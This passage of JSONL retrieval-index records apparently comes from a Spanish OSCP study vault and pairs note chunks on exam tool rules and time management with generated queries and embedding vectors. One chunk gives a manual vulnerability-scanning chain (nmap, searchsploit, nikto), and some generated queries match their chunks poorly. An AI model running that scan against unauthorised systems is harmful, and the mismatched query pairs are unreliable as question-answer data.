0.06357, -0.02644, -0.0696, 0.17234, 0.14689, 0.0153, 0.04146, -0.00826, 0.00436, 0.04362, -0.09692, 0.10613, 0.00968, 0.04853, 0.05231, 0.0191, 0.00368, 0.00282, -0.02707, -0.01616, -0.04281, 0.00066, 0.02318, -0.01455, 0.02788, 0.06238, -0.13456, -0.09956, -0.00234, 0.00395, 0.04383, -0.03043, 0.07156, -0.00505, -0.01398, 0.12168, 0.05914, -0.00734, 0.06068, 0.09651, -0.01038, 0.05549, -0.02787, -0.1089, -0.08182, 0.10119, -0.03391, 0.12302, 0.03052, 0.00552, -0.01938, -0.04123, 0.02533, 0.04811, -0.04912, -0.09795, -0.08952, 0.03529, -0.0713, 0.00857, 0.03325, -0.00606, -0.06113, -0.0348, 0.02253, -0.05777, 0.05225, 0.01967, 0.04404, 0.10782, -0.03114, 0.02805, 0.00135, -0.04556, -0.00921, -0.00163, -0.0524, -0.01681, 0.01637, -0.09358, 0.01975, -0.00288, 0.01793, 0.05619, 0.05244, -0.00481, 0.04488, 0.0388, -0.03499, -0.05761, -0.02051, -0.00737, -0.01573, 0.04072, -0.03567, 0.085, -0.06757, 0.0403, 0.01305, -0.02974, -0.02858, 0.12514, -0.01636, 0.05885, 0.00768, 0.04351, 0.008, -0.0072, 0.04563, -0.02934, 0.02215, 0.06617, -0.00692, 0.07402, 0.00097, -0.02926, -0.00313, -0.01815, 0.02638, -0.05061, 0.00471, -0.02333, -0.08853, 0.00125, 0.01921, -0.01204, -0.00716, -0.03411, -0.01379, -0.01035, 0.05618, 0.06961, 0.01276, 0.01392, 0.00078, 0.0124, 0.02647, -0.05797, -0.02903, 0.00541, 0.00504, -0.05914, -0.10969, 0.01204, -0.01349, -0.03354, 0.06677, 0.07844, -0.01587, 0.03733, -0.01802, 0.09375, 0.00392, -0.03934, 0.07038, -0.05856, -0.04994, -0.03673, 0.02415, 0.04118, 0.00466, 0.00717, -0.0221, -0.02276, 0.07445, 0.04273, 0.00844, -0.00917, 0.04303, 0.04343, 0.08163, 0.02476, 0.00312, -0.03173, -0.06457, -0.05824, 0.08617, -0.00377, 0.02097, -0.02463, -0.01384, -0.04629, 0.04204, 0.04449, -0.0039, -0.09644, -0.0141, -0.06571, -0.07434, 0.00763, -0.01806, -0.04796, -0.00415, 0.06203, 0.00792, -0.08317, 0.04409, -0.06214]} -{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## β›” Prohibido\n- **Metasploit / Meterpreter β†’ solo en UNA mΓ‘quina.**\n - Solo el **foothold inicial** cuenta como \"uso\"; post-explotaciΓ³n con meterpreter NO cuenta.\n- ExplotaciΓ³n automΓ‘tica: `sqlmap` en modo auto, autopwn.\n- EscΓ‘neres de vulnerabilidades masivos: **Nessus, OpenVAS, Nexpose, Core Impact**.\n- IA durante el examen.", "indexar": "quΓ© alternativas a sqlmap o Nessus me sirven para hacer pruebas de penetraciΓ³n manuales?", "v": [0.00567, -0.03718, -0.11863, -0.16277, -0.01967, -0.11239, -0.17616, -0.08311, -0.08312, 0.08428, -0.19333, 0.05942, 0.0295, -0.11123, -0.01522, 0.10224, -0.00024, -0.02913, 0.08421, 0.12181, -0.12362, -0.11173, -0.22623, -0.04244, -0.10657, 0.15863, -0.04162, 0.00498, -0.10672, -0.02652, -0.13718, 0.00828, -0.01523, -0.10276, -0.10509, -0.01679, -0.08702, -0.01455, 0.01641, 0.0074, -0.01166, 0.02753, -0.07739, 0.04479, 0.05635, -0.13765, -0.04819, -0.02433, -0.09792, -0.04409, -0.00021, 0.04109, -0.04372, -0.02592, -0.14079, -0.0846, 0.09394, -0.02373, 0.01955, -0.03957, -0.09278, -0.01891, 0.09286, -0.0685, 0.05019, -0.13164, 0.01756, -0.02146, 0.00493, 0.08737, 0.03106, 0.10855, 0.00916, -0.1064, -0.11137, -0.01952, 0.1024, 0.0388, 0.05857, 0.01774, 0.02226, 0.00516, -0.08806, 0.01508, -0.00337, -0.01108, -0.00691, 0.05195, -0.01208, -0.10052, 0.07509, 0.05268, 0.06159, 0.05179, 0.05199, -0.04667, 0.06887, 0.02082, 0.00423, -0.00292, 0.04321, -0.03369, -0.08917, 0.04939, -0.03708, -0.00125, -0.01287, 0.03607, -0.0782, -0.0147, 0.11917, 0.06276, -0.17921, -0.04481, -0.02679, 0.01003, 0.0257, 0.00248, -0.07417, 0.00338, -0.09231, -0.01536, -0.04501, -0.0244, -0.07546, 0.02616, 0.06785, 0.05006, -0.01873, 0.05068, 0.05696, 0.00521, -0.05366, -0.03322, 0.06302, -0.02147, 0.00681, -0.10806, 0.04089, -0.01232, 0.02409, 0.02869, 0.01151, -0.04479, -0.0027, 0.03601, -0.02982, -0.01496, -0.03442, 0.01671, -0.06838, -0.03214, -0.04064, 0.11989, -0.02465, -0.05892, 0.06973, -0.03452, -0.13497, 0.12509, 0.01445, -0.02298, -0.04869, 0.07436, 0.00765, 0.01434, -0.01274, -0.13744, 0.00778, -0.01286, -0.02608, 0.05078, -0.01219, -0.07521, 0.11158, -0.03951, -0.01182, -0.0334, 0.03576, -0.07172, -0.01098, 0.03327, -0.0565, -0.04626, 0.03224, -0.00318, -0.04054, -0.03781, 0.04061, 0.02873, -0.02712, 0.04524, -0.01551, -0.01543, 0.04315, -0.02708, 0.04276, 0.00389, -0.13362, -0.03329, -0.00749, -0.07498, -0.04498, -0.02125, 0.00106, 0.06973, 0.00329, 0.03421, -0.03223, -0.00458, 0.04709, 0.00264, 0.0274, -0.02935, -0.06616, -0.04153, 0.01629, 0.01763, -0.03881, 0.00418, 0.05033, -0.03433, -0.02717, -0.00828, -0.00901, 0.09743, 0.00552, -0.02172, 0.02136, -0.02116, 0.01953, -0.02174, 0.00014, -0.03231, 0.01479, -0.01366, -0.04905, 0.03472, 0.04572, -0.09994, -0.0169, 0.03878, -0.03034, 0.03188, -0.0197, -0.04722, 0.02245, -0.0407, -0.02467, -0.00772, 0.04181, -0.03121, 0.00547, -0.02741, 0.07731, -0.0336]} -{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Nota prΓ‘ctica\nNessus se aprende para el **trabajo real** (es estΓ‘ndar), pero en el examen se replica a mano:\n```\nnmap -sV β†’ searchsploit β†’ nmap --script vuln / nikto\n```\n\nRelacionado: Estructura del examen Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "quΓ© herramientas se usan para hacer un anΓ‘lisis de vulnerabilidades en el trabajo real", "v": [0.02164, 0.07519, -0.08622, -0.11435, 0.01638, -0.06397, -0.05585, -0.0111, 8e-05, 0.00568, -0.05237, -0.17361, -0.03975, -0.00768, 0.07014, 0.08825, 0.0132, -0.14158, 0.01216, 0.02692, -0.02683, -0.09393, -0.13634, 0.00076, -0.10129, -0.0058, 0.04748, 0.01094, -0.09199, 0.09869, -0.02537, 0.09318, 0.07252, -0.08903, -0.00485, 0.04244, -0.03804, 0.08671, 0.05843, 0.08953, 0.06672, 0.01711, -0.09774, 0.03413, 0.06834, -0.08285, -0.0445, -0.1253, -0.08373, 0.1338, -0.08932, -0.06343, -0.08433, -0.08607, -0.00153, -0.15043, 0.16179, -0.10655, 0.05865, -0.06766, -0.16608, 0.14425, -0.02653, -0.00781, 0.08273, 0.01752, 0.00381, -0.03538, -0.07995, 0.15105, -0.0016, -0.01302, -0.08525, -0.03637, -0.04075, -0.03605, -0.01259, 0.10089, -0.06372, -0.08552, 0.06042, 0.08508, 0.03564, 0.12544, -0.15082, -0.06508, 0.09182, -0.04547, -0.00729, -0.09319, 0.02107, 0.12781, -0.08256, -0.01681, 0.01902, 0.0413, 0.06528, -0.07677, -0.05502, 0.02931, 0.05951, -0.10887, -0.01371, -0.00324, -0.00749, 0.14795, -0.03518, 0.0576, -0.09137, -0.06354, -0.0713, 0.04577, -0.07227, -0.00917, -0.04908, 0.004, -0.06204, -0.06679, 0.03738, -0.11125, 0.01708, 0.01336, -0.03697, -0.00831, -0.05965, -0.07056, 0.05457, 0.01591, 0.04705, -0.06147, -0.00663, -0.02831, -0.12816, 0.00526, 0.0005, -0.01204, 0.0632, -0.12527, -0.07733, -0.11079, -0.00263, 0.07784, -0.01041, -0.03074, -0.01502, 0.09043, -0.01402, -0.01821, -0.10987, -0.0247, 0.01812, -0.00322, 4e-05, 0.02125, -0.01271, -0.02732, -0.09083, 0.00593, -0.06255, 0.05094, 0.0514, 0.00871, -0.04835, 0.01276, 0.00564, 0.01707, 0.0665, 0.05083, 0.0966, 0.045, 0.0002, 0.03098, 0.1213, -0.05959, 0.07919, -0.03203, 0.0201, -0.03082, 0.00098, -0.0603, 0.0118, -0.0234, 0.01715, 0.02713, 0.0427, 0.02653, 0.08495, -0.03726, 0.01867, 0.07751, -0.03413, -0.03648, 0.02938, 0.03394, 0.07089, 0.0083, 0.04578, -0.03601, -0.0354, -0.0575, -0.01939, -0.08843, -0.02929, -0.0418, 0.03717, 0.09787, -0.07341, -0.03173, -0.02457, 0.0529, 0.03471, -0.01937, 0.04201, -0.05405, 0.00715, -0.013, -0.01577, 0.04331, -0.01908, -0.03193, 0.0156, -0.0112, 0.0007, -0.00965, -0.03401, 0.00661, -0.03958, -0.03779, 0.02565, 0.00501, 0.0684, 0.001, -0.05329, 0.00959, -0.02619, -0.02973, 0.01816, 0.03806, -0.00691, -0.03223, 0.04107, 0.00964, -0.02641, -0.05825, -0.02453, -0.00939, -0.04127, 0.00134, -0.06228, -0.05269, -0.06069, 0.01006, 0.03183, -0.06403, 0.03537, -0.08454]} -{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Nota prΓ‘ctica\nNessus se aprende para el **trabajo real** (es estΓ‘ndar), pero en el examen se replica a mano:\n```\nnmap -sV β†’ searchsploit β†’ nmap --script vuln / nikto\n```\n\nRelacionado: Estructura del examen Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "con quΓ© programas se replica un ataque simulando una respuesta a exploits", "v": [-0.04958, 0.07311, -0.20408, -0.17129, 0.00147, -0.09492, -0.11485, 0.04217, 0.03052, 0.03397, 0.02521, -0.07082, 0.00398, 0.06228, 0.03869, -0.10349, 0.01509, 0.06754, 0.08027, -0.05434, -0.00265, -0.02314, -0.02311, -0.07454, 0.04276, 0.06789, 0.01797, 0.10005, 0.04692, -0.12823, -0.01078, 0.04816, 0.05365, -0.14869, -0.02356, 0.00558, 0.00892, 0.00665, 0.13755, 0.13352, -0.00471, -0.06265, -0.22904, -0.06286, 0.08772, -0.00077, -0.03531, -0.04507, 0.03373, -0.0748, -0.02914, -0.03333, -0.15961, -0.07929, 0.04148, -0.15302, 0.09934, -0.15752, 0.07757, -0.01954, -0.05821, 0.01427, 0.1048, -0.05784, 0.10767, -0.05928, 0.04072, -0.02731, -0.06218, 0.0691, -0.06245, 0.05007, 0.00476, 0.02889, -0.04975, -0.08868, -0.02618, 0.04514, -0.04911, 0.02845, -0.0632, -0.11298, -0.0639, 0.02905, -0.01757, 0.01244, 0.0553, 0.04104, -0.00307, -0.04675, -0.06413, -0.01408, -0.04416, 0.06412, -0.02029, -0.11696, 0.10057, -0.02372, 0.02169, 0.10388, -0.01034, -0.08601, -0.14679, 0.10047, -0.05568, 0.1043, 0.00103, -0.06669, -0.04976, -0.0774, 0.01415, -0.06783, -0.10119, -0.00716, 0.04681, -0.01886, -0.07238, -0.07285, 0.09752, -0.02468, -0.11386, 0.05214, 0.00361, 0.0253, -0.01909, 0.02815, -0.01478, -0.02908, -0.08731, -0.0235, -0.04184, -0.00492, 0.06877, -0.03574, 0.00055, -0.09593, 0.06, -0.06632, 0.01825, -0.06253, 0.0554, 0.14168, 0.0148, -0.04319, -0.06361, 0.06037, 0.00623, -0.04843, -0.06257, 0.02865, -0.01707, 0.02345, 0.06701, 0.09075, -0.13914, -0.00464, -0.00213, -0.00785, -0.00223, 0.1381, -0.03859, -7e-05, -0.00747, 0.01115, 0.07252, -0.05175, 0.02022, -0.0537, 0.02094, 0.05377, -0.04887, 0.08409, 0.06001, -0.03018, 0.06736, 0.00917, -0.04893, -0.0266, -0.01233, -0.00356, -0.0332, -0.00409, 0.0138, 0.01801, -0.01993, -0.08106, 0.03188, 0.06082, 0.03284, 0.034, 0.07487, 0.0034, 0.0711, 0.06278, 0.004, 0.02449, -0.01512, 0.0532, 0.02283, 0.00844, 0.00822, -0.03497, -0.05406, -0.03097, 0.06957, 0.14479, -0.04094, 0.0186, -0.04385, 0.07767, 0.00658, 0.01509, 0.07188, -0.01007, -0.03479, -0.05367, 0.05193, 0.05859, 0.03597, -0.02383, 0.03266, 0.02994, 0.00685, 0.04276, -0.08547, -0.03061, -0.01938, 0.01633, 0.01643, 0.00964, 0.00388, -0.06897, 0.02511, 0.00781, -0.00831, -0.04066, 0.05683, -0.02641, -0.05913, -0.0349, -0.05199, 0.05965, 0.02061, -0.05619, -0.01332, -0.00321, -0.04515, 0.00399, 0.00643, -0.00897, -0.02307, -0.00042, 0.00031, -0.03905, 0.06532, 0.0137]} -{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# GestiΓ³n del tiempo\n\n> 24h β‰  24h. **Duermes 6h. Comes. Te duchas.** El cerebro fresco resuelve; el cansado entra en rabbit-holes.", "indexar": "que programa me ayuda a gestionar mejor mis horas de sueΓ±o y descanso?", "v": [-0.04748, 0.11517, -0.17807, -0.15551, -0.09236, -0.04138, -0.1412, 0.00154, -0.01745, -0.07278, -0.11792, -0.05975, 0.08661, -0.08223, -0.07542, -0.02332, 0.06945, 0.10277, 0.00017, 0.09281, 0.0376, 0.02474, 0.04785, -0.02001, -0.01801, -0.00878, 0.09721, -0.00401, -0.06178, -0.04061, -0.02971, -0.02907, 0.05406, -0.12063, 0.09698, 0.05405, 0.05421, 0.10588, 0.05369, -0.02061, -0.00851, -0.01796, 0.07643, 0.02952, 0.15403, -0.04903, 0.09415, -0.03377, -0.06578, -0.06706, -0.04715, -0.01137, 0.15118, -0.01234, 0.06578, -0.02127, 0.01672, -0.07064, -0.06361, -0.00145, 0.00756, -0.06347, 0.00072, 0.00422, 0.20528, 0.01546, 0.0702, -0.01084, -0.08065, 0.03538, -0.08737, 0.06341, 0.04009, -0.12203, 0.01499, -0.12048, 0.01259, -0.03751, 0.02845, -0.12085, 0.08381, 0.06044, -0.05259, 0.0544, -0.06907, -0.0274, 0.07539, 0.05112, -0.0227, -0.02138, -0.00822, -0.03618, -0.0416, -0.00951, -0.05928, 0.06344, 0.14325, -0.02825, 0.13909, 0.06392, 0.06443, 0.01425, -0.04604, 0.06816, 0.00653, 0.08048, 0.02888, 0.00715, -0.17109, 0.01446, -0.06174, 0.02732, -0.05012, -0.02484, 0.00905, -0.02737, -0.12449, -0.05998, 0.10457, -0.09795, 0.00627, -0.03858, -0.00436, 0.09847, 0.11249, -0.02385, 0.04071, 0.04667, 0.06166, 0.08351, -0.06487, 0.05137, -0.00068, 0.00107, -0.06323, 0.02706, 0.01942, 0.08117, 0.06348, -0.04724, -0.01974, 0.12157, -0.04733, -0.01242, -0.01122, -0.02027, 0.01991, -0.09855, 0.02564, 0.00578, 0.03928, 0.04759, 0.12477, -0.07751, -0.02879, 0.05859, -0.07952, 0.01093, -0.03448, 0.07617, -0.02303, -0.03298, -0.06485, -0.04132, 0.11004, -0.03845, -0.01785, 0.03069, 0.01084, 0.18442, -0.05461, -0.00459, 0.02898, -0.1116, -0.05563, -0.0421, 0.01214, -0.00525, 0.02374, -0.03783, -0.08897, 0.03355, 0.04323, 0.05632, -0.00105, -0.02916, -0.05109, 0.06859, -0.10789, -0.0465, 0.03871, -0.02339, -0.0052, 0.03647, 0.01233, -0.09138, -0.03636, 0.02532, 0.11157, -0.00683, -0.01986, -0.02759, 0.01473, -0.01173, 0.00237, 0.07684, -0.00849, 0.09784, 0.04373, 0.02716, 0.03498, 0.02421, 0.00905, -0.02124, -0.04895, 0.00273, 0.03345, 0.00934, -0.00941, -0.05369, -0.02494, -0.02006, 0.03944, 0.01771, -0.0573, -0.04456, 0.08113, 0.08938, 0.00692, 0.03893, -0.02286, -0.02533, 0.00774, 0.00626, 0.04491, -0.03174, -0.02237, -0.02494, 0.04048, -0.01352, 0.01969, 0.02872, 0.03034, -0.04149, -0.04134, 0.03641, -0.07171, -0.03818, 0.00135, -0.00034, -0.07307, 0.02083, 0.06467, -0.04592, 0.06669, -0.00343]} -{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# GestiΓ³n del tiempo\n\n> 24h β‰  24h. **Duermes 6h. Comes. Te duchas.** El cerebro fresco resuelve; el cansado entra en rabbit-holes.", "indexar": "cΓ³mo puedo programar mi dΓ­a para que el tiempo de vigilia sea mΓ‘s productivo?", "v": [0.22609, 0.09705, -0.13805, 0.075, 0.01494, -0.03664, 0.0288, -0.06165, -0.07553, -0.18561, 0.00992, -0.04899, 0.07996, -0.0052, -0.06756, 0.00027, 0.06726, -0.0127, 0.05619, 0.04089, 0.00405, 0.02554, -0.02398, -0.09299, 0.05187, -0.00312, 0.16937, 0.05227, -0.16339, 0.03198, -0.00811, 0.11934, 0.1006, -0.22451, 0.04075, 0.0183, -0.01004, 0.12954, -0.09979, -0.05672, -0.02889, 0.02543, 0.0634, -0.05562, 0.11211, -0.05748, 0.11093, -0.07796, -0.06662, 0.0058, -0.13158, 0.02251, 0.06139, 0.05719, 0.02051, 0.06015, -0.03575, -0.09784, 0.05188, -0.09853, 0.01047, 0.08031, 0.02139, -0.07761, 0.06623, 0.03079, -0.01518, -0.04523, -0.08869, 0.08316, -0.12202, -0.00836, -0.09036, -0.02722, 0.07806, -0.03933, 0.02173, 0.07715, -0.04893, -0.04648, -0.08938, -0.02498, 0.03951, -0.05769, -0.07526, 0.04085, 0.09547, -0.03247, -0.10313, -0.00188, 0.00175, 0.05864, 0.02829, 0.02179, 0.05902, 0.05749, 0.07217, 0.02083, 0.04596, 0.05739, 0.06767, -0.12389, -0.06322, 0.04383, 0.02485, 0.01694, 0.06406, 0.04233, 0.04377, -0.06461, -0.01493, -0.07612, -0.09798, -0.0611, 0.03759, 0.03664, 0.01776, -0.05473, -0.00622, -0.01036, 0.05833, 0.01278, -0.00441, 0.05944, 0.05006, -0.06094, 0.02947, 0.06077, -0.06993, -0.0022, -0.0416, -0.01003, -0.06575, -0.0004, -0.06235, 0.09661, 0.06527, -0.04919, -0.03858, -0.03258, 0.02683, 0.07778, -0.03576, -0.01898, 0.06857, 0.03598, -0.06276, -0.03948, -0.08715, 0.00269, -0.00771, 0.03344, 0.0063, 0.04131, -0.08616, -0.01183, 0.01182, -0.01597, -0.01139, 0.07042, -0.03825, 0.00614, -0.08934, -0.095, 0.10523, -0.0867, -0.00411, -0.01987, 0.04067, 0.10489, 0.02545, 0.07973, -0.01101, -0.11562, 0.06537, -0.04064, -0.00601, 0.00652, -0.0796, -0.01277, 0.01604, 0.0717, -0.06515, 0.00979, -0.06618, -0.02418, -0.01699, -0.03051, -0.02331, 0.02275, 0.04516, 0.08188, 0.01595, -0.04392, -0.04436, -0.057, -0.01414, -0.01212, 0.05238, -0.0076, -0.01442, -0.03647, 0.00091, -0.07062, 0.07008, 0.06714, -0.08077, 0.0455, 0.02157, 0.03583, -0.00209, 0.00016, 0.04463, -0.07957, -0.07577, -0.01743, 0.01934, -0.0307, 0.03424, 0.00849, 0.03848, 0.05811, 0.05455, -0.03227, -0.0609, -0.01871, 0.05594, 0.08205, 0.00967, 0.07283, -0.03132, -0.00329, -0.03091, -0.1022, -0.0143, -0.01999, -0.03001, -0.04254, -0.01053, -0.04206, 0.05256, 0.10138, -0.0335, -0.04698, -0.08138, -0.05585, -0.08211, -0.01784, -0.03209, -0.05236, -0.04545, -0.0018, 0.08876, -0.00639, 0.07107, -0.07508]} -{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# GestiΓ³n del tiempo\n\n> 24h β‰  24h. **Duermes 6h. Comes. Te duchas.** El cerebro fresco resuelve; el cansado entra en rabbit-holes.", "indexar": "quΓ© herramienta sirve para optimizar la energΓ­a mental durante el dΓ­a?", "v": [0.00298, 0.04534, -0.08585, -0.13434, -0.02384, -0.04253, -0.23722, 0.01214, -0.10672, -0.09905, -0.11179, -0.00808, 0.06608, -0.0464, 0.02715, 0.06307, 0.16862, -0.03038, -0.09521, -0.02958, -0.08005, -0.03585, -0.07195, -0.06134, -0.01003, 0.0171, 0.04287, 0.02955, -0.23797, 0.09518, -0.01511, 0.08329, 0.12472, -0.16465, -0.04009, 0.05441, -0.03748, 0.14938, -0.03266, -0.05368, -0.09954, 0.05335, -0.00198, 0.10681, 0.10829, 0.02009, -0.02168, 0.02812, 0.06564, 0.06333, -0.09606, -0.00155, -0.02062, -0.01343, 0.08827, -0.01087, -0.04164, -0.15932, 0.08551, -0.1639, -0.10296, 0.08285, -0.05301, -0.11966, 0.02128, 0.06445, 0.03613, 0.03621, -0.06354, 0.12419, -0.11323, -0.01042, 0.08219, -0.06461, 0.01983, 0.04947, 0.0285, 0.07358, 0.03262, -0.05539, -0.00165, -0.04882, -0.15204, 0.03522, -0.11066, -0.00891, 0.1319, -0.01468, -0.02318, -0.07493, -0.04574, 0.04819, 0.0983, 0.01072, -0.02668, 0.05794, 0.07217, -0.00148, 0.01557, 0.0041, 0.104, -0.06172, -0.085, -0.00962, 0.0524, -0.10252, -0.09374, -0.01614, -0.09415, 0.0001, -0.00496, -0.02698, 0.01723, 0.02288, 0.01393, 0.04733, 0.01365, -0.05927, -0.04309, -0.00976, 0.01509, -0.04934, 0.03744, -0.00482, 0.01763, -0.01601, -0.02609, 0.01125, 0.05291, -0.06614, -0.03301, -0.0425, -0.06447, 0.05107, -0.06626, -0.00813, 0.01552, -0.08374, 0.00435, -0.07509, 0.0571, 0.03311, -0.03148, -0.06774, 0.01682, 0.04926, 0.04419, 0.0059, -0.0095, 0.00539, 0.0286, -0.04566, 0.09789, -0.01038, -0.07341, 0.06638, -0.10069, -0.01532, -0.08778, 0.06456, -0.05629, -0.07631, 0.02146, 0.04586, 0.04818, -0.06112, 0.00831, 0.04015, -0.02478, 0.12621, 0.04041, -0.04058, 0.03851, -0.02296, 0.02601, -0.04682, -0.03977, 0.02786, -0.00656, -0.00091, -0.04052, -0.00486, -0.05338, -0.01591, -0.0707, 0.05537, 0.00388, -0.07531, -0.00288, -0.02634, -0.01265, -0.01706, 0.01412, -0.06454, 0.04237, -0.01022, -0.00172, -0.00411, 0.03882, 0.01019, -0.00614, -0.03643, -0.01147, -0.02071, 0.00635, 0.13695, 0.01778, 0.00324, 0.02983, 0.0149, -0.02816, -0.09686, 0.07165, -0.08404, -0.09348, -0.06509, -0.00521, -0.01856, -0.01569, -0.00754, 0.03613, 0.05546, 0.02549, 0.03129, -0.04365, 0.05413, 0.04721, 0.02407, -0.07965, 0.04599, -0.03122, -0.01828, 0.00179, -0.02025, 0.0372, -0.05015, -0.00996, -0.00532, -0.03021, -0.02295, -0.03576, 0.07035, -0.01024, -0.02006, 0.02358, -0.00057, -0.00449, -0.03998, 0.00491, -0.03176, -0.0582, 0.00419, 0.0637, 0.01261, 0.08135, -0.0684]} -{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Reglas\n- **1.5h sin progreso = cambia de mΓ‘quina.** Cierra, vuelve mΓ‘s tarde con cabeza fresca.\n- Empieza por el **set de AD** (40 pts) con tiempo β†’ ver Estructura del examen.\n- Saca **todos los `user`** antes de pelear un root concreto.\n- Vigila el Egress filtering pronto: descubrir tarde que un puerto estΓ‘ bloqueado cuesta horas.", "indexar": "ΒΏQuΓ© tΓ©cnica ayuda a saber si voy a avanzar en un ataque por la fuerza bruta?", "v": [-0.06193, 0.06628, -0.20061, -0.05009, -0.04428, 0.06403, 0.06219, -0.05186, 0.077, -0.07734, -0.11126, -0.09189, -0.05441, 0.19251, 0.00657, -0.12282, 0.03058, -0.06592, 0.02195, -0.07067, 0.05112, -0.06716, -0.01605, -0.06201, -0.09268, -0.01599, 0.00091, 0.1201, -0.1123, -0.09269, -0.01433, 0.05528, 0.15169, 0.01064, 0.05524, 0.01365, 0.0005, 0.00951, 0.1775, 0.09457, -0.16373, -0.08147, -0.02169, -0.06827, 0.06092, -0.03144, -0.02117, 0.08103, 0.04382, 0.01541, -0.045, 0.02934, -0.04113, -0.12388, -0.11864, -0.1154, 0.0976, -0.08683, -0.07296, -0.01202, -0.11034, -0.00922, -0.07001, -0.04127, 0.05441, -0.06715, -0.03275, -0.10934, -0.02376, 0.00522, -0.11911, -0.01049, -0.0543, 0.00746, -0.11081, 0.01045, 0.02525, 0.07602, 0.05285, -0.0582, 0.00141, 0.0878, -0.12311, -0.07418, -0.06982, -0.08978, 0.05734, -0.02947, -0.06429, -0.13323, 0.02424, 0.00231, 0.02438, -0.04819, -0.03699, 0.08641, -0.03739, -0.02759, -0.01222, -0.04527, -0.01194, -0.19492, -0.07693, -0.06695, 0.0843, -0.04438, -0.04656, -0.0798, -0.09918, 0.01801, -0.06692, 0.05542, -0.07241, 0.02586, -0.0427, -0.02697, -0.06593, -0.06635, -0.07835, 0.0379, -0.07876, 0.0665, 0.01031, 0.07218, -0.02774, -0.01162, 0.02031, 0.04507, -0.01193, -0.06146, 0.0101, -0.02683, 0.06709, -0.07268, 0.06114, 0.03164, 0.0885, -0.0706, -0.05163, -0.01239, 0.00617, 0.06203, -0.02169, -0.06067, 0.02207, 0.00401, 0.0313, -0.0633, -0.13213, 0.01159, 0.08655, -0.02309, 0.09106, 0.10664, -0.03229, -0.07256, 0.09814, -0.05646, -0.08238, 0.06804, -0.01904, 0.04084, -0.10705, -0.07891, -0.04911, -0.00696, -0.06398, -0.03118, 0.01974, 0.02065, -0.03385, -0.0495, 0.00039, 0.04537, 0.0177, -0.08377, -0.04534, 0.0225, -0.00922, 0.01315, 0.03074, -0.02266, -0.01301, 0.02948, 0.0136, -0.00516, 0.05344, -0.02756, 0.02151, 0.04437, -0.00789, -0.00048, -0.05444, 0.01793, -0.05399, -0.09277, -0.05759, 0.04674, 0.01335, 0.02645, 0.02501, -0.06853, 0.02199, -0.0086, 0.02664, 0.05412, -0.02433, -0.04331, -0.02811, 0.00496, 0.00651, 0.0166, 0.05236, -0.04823, -0.06422, 0.0039, -0.04221, 0.0397, -0.00934, -0.01792, 0.00484, 0.06115, 0.0192, 0.01503, 0.02655, -0.00909, 0.06211, -0.03435, -0.00235, 0.07657, -0.00123, -0.07029, 0.07054, -0.00268, -0.01954, -0.02174, 0.05887, 0.01271, -0.07891, 0.01688, 0.02591, 0.03045, 0.00948, -0.03105, -0.05628, -0.00457, -0.07558, 0.02372, -0.06991, -0.03372, 0.04131, 0.02612, 0.05034, -0.02907, 0.09112, -0.04467]} -{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Reglas\n- **1.5h sin progreso = cambia de mΓ‘quina.** Cierra, vuelve mΓ‘s tarde con cabeza fresca.\n- Empieza por el **set de AD** (40 pts) con tiempo β†’ ver Estructura del examen.\n- Saca **todos los `user`** antes de pelear un root concreto.\n- Vigila el Egress filtering pronto: descubrir tarde que un puerto estΓ‘ bloqueado cuesta horas.", "indexar": "ΒΏCΓ³mo puedo asegurarme de no quedarme atascado esperando que alguien me dΓ© una contraseΓ±a?", "v": [-0.17142, 0.26259, -0.07791, 0.0414, -0.18441, 0.04711, -0.0804, 0.03956, -0.13725, -0.12984, -0.01975, -0.0497, -0.04235, -0.05418, 0.01247, 0.07529, 0.10935, 0.16124, 0.12926, 0.02225, 0.10101, -0.12507, 0.01456, 0.0105, 0.04444, -0.08181, 0.10454, 0.02416, -0.14818, -0.14632, -0.05782, -0.079, 0.05947, 0.02057, 0.10142, 0.11107, 0.01592, 0.01312, 0.05541, 0.10135, 0.10854, 0.00183, -0.01593, 0.07283, 0.0031, 0.05692, -0.05211, -0.05389, 0.08759, 0.01558, -0.11104, -0.07643, -0.05243, -0.02974, -0.05568, 0.08247, 0.19365, 0.05435, 0.04219, -0.01653, -0.08354, 0.01604, 0.10059, 0.13585, -0.14322, -0.07917, 0.04151, 0.07913, -0.07247, 0.09556, -0.03639, -0.07736, -0.09645, 0.00222, -0.00125, -0.00736, 0.05292, -0.05671, 0.02244, 0.07534, -0.09832, 0.05496, 0.02431, 0.03038, -0.02226, 0.05072, -0.00882, -0.03422, -0.00711, -0.04301, 0.04847, -0.07226, -0.08998, 0.00267, -0.04757, -0.06151, -0.03944, 0.05016, -0.05732, -0.02549, -0.01212, 0.05415, -0.01545, 0.07366, -0.02057, 0.00598, -0.00977, -0.03766, 0.00711, -0.07515, 0.07171, 0.04259, -0.06456, -0.0631, -0.04744, 0.02007, 